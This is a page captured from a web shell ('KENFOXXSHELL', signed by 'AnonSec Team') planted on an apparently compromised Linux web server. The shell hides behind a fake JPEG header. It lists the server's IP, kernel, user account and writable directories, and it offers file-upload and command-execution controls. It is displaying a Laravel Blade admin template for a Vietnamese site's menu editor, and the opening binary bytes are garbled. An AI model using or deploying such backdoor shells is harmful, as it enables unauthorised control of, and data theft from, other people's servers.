JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/storage/framework/views/4d5416b144cb45d80f85d88f4a2a7bad7cc51c0f.php
<?php $__env->startSection('controller','Thêm '); ?>
<?php $__env->startSection('action','Add'); ?>
<?php $__env->startSection('content'); ?>
	<section class="content">
	    <div class="box">
	    	<div class="box-body">
				<div class="col-sm-6">
			    	<form action="<?php echo e(asset('/admin/menu/'.$menu->id.'/edit')); ?>" method="POST" enctype="multipart/form-data">
			    		<div class="form-group ">
					      	<label for="ten">Tiêu đề</label>
					      	<input type="text" id="txtName" name="txtName" value="<?php echo e($menu->title); ?>" class="form-control" required="">
						</div>
						<div class="form-group">
					      	<label for="ten">Tiêu đề (Tiếng anh )</label>
					      	<input type="text" id="txtName" name="txtNameeg" value="<?php echo e($menu->tileeg); ?>" class="form-control" required="">
						</div>
						<div class="form-group">
					      	<label for="ten">Link</label>
					      	<input type="text" id="txtName" name="txtLink" value="<?php echo e($menu->url); ?>" class="form-control" required="">
						</div>
						<div class="form-group ">
							<a href="<?php echo e(asset( '/admin/menu/'.$menu->id.'/delete-image' )); ?>" class="btn btn-danger">Xóa Ảnh</a>
						</div>
						<div class="form-group ">
					      	<label for="ten">Hình ảnh</label>
					      	<img src="<?php echo e(asset('upload/menu/'.$menu->image )); ?>" alt="" class="img-thumbnail">
					      	<input type="file" id="txtName" name="image" value="" class="form-control">
						</div>
						
						<div class="form-group ">
					      	<label for="ten">Hình ảnh (Tiếng anh)</label>

					      	<img src="<?php echo e(asset('upload/menu/'.$menu->imageeg )); ?>" alt="" class="img-thumbnail">
					      	<input type="file" id="txtName" name="imageeg" value="" class="form-control" >
						</div>
						<div class="form-group ">
					      	<label for="ten">Mô tả</label>
					      	<input type="text" id="txtDesc" name="txtDesc" value="<?php echo e($menu->mota); ?>" class="form-control" >
						</div>
						<div class="form-group ">
					      	<label for="ten">Mô tả (Tiếng anh)</label>
					      	<input type="text" id="txtDesceg" name="txtDesceg" value="<?php echo e($menu->motaeg); ?>" class="form-control" >
						</div>
						<div class="form-group ">
					      	<input type="submit" value="THÊM MENU" class="btn btn-block btn-danger">
						</div>
						<?php echo e(csrf_field()); ?>

			    	</form>
			    </div>
			</div>
		</div>
	</section>
<?php $__env->stopSection(); ?>
<?php echo $__env->make('admin.master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team